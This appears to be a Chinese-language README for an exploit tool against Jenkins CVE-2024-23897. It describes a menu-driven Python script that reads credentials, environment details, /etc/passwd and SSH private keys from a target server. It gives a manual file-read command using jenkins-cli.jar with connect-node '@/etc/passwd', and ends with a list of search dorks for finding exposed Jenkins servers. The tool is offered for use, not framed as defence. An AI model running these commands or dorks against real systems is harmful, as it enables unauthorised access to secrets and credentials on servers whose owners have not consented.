受影响版本:
一个用 Python 编写的脚本,用于自动化 CVE-2024-23897 漏洞 🤖 🛠️
此 Python 代码提供了一个针对 Jenkins 服务器特定漏洞(CVE-2024-23897)的扫描器。
它首先请求用户输入 Jenkins 服务器的 URL。
然后,提供下载与 Jenkins 命令行交互所需的 jenkins-cli.jar 文件的选项。之后,呈现一个选项菜单,包括执行命令,如获取服务器信息、环境信息、Jenkins 配置信息、用户信息、凭据信息,以及读取敏感文件如 /etc/passwd、/etc/os-release 和 id_rsa。
一旦选择了菜单中的选项,就会在提供的 Jenkins 服务器上执行相应的命令。代码结构包括用于下载文件和执行命令的函数,以及一个用于处理程序流程的主函数。
针对 Jenkins 服务器的执行 📝:
python3 CVE-2024-23897-A-scaner.py
针对 Docker 中的 Jenkins 服务器执行 📝:
python3 CVE-2024-23897-B-DOCKER-scaner.py
---------------------------------------------------------------------------------------------------------------------------------
手动执行。
1- 下载 jenkins-cli.jar:http:///jnlpJars/jenkins-cli.jar
2- 执行 LFI:java -jar jenkins-cli.jar -s http://172.17.0.2:8080/ -http connect-node "@/etc/passwd"
dork 列表:
intitle:"Dashboard [Jenkins]" inurl:"/login"
intitle:"Jenkins" "Dashboard"
inurl:"/computer/" intitle:"Jenkins"
inurl:"/script" intitle:"Jenkins"
"Jenkins [Jenkins]" intitle:"Login"
intitle:"Jenkins" "Jenkins ver. 2.441"
inurl:"/manage" intitle:"Jenkins"
site:.com intitle:"Jenkins"
site:aws.amazon.com intitle:"Jenkins"
filetype:xml inurl:"jenkins/config.xml"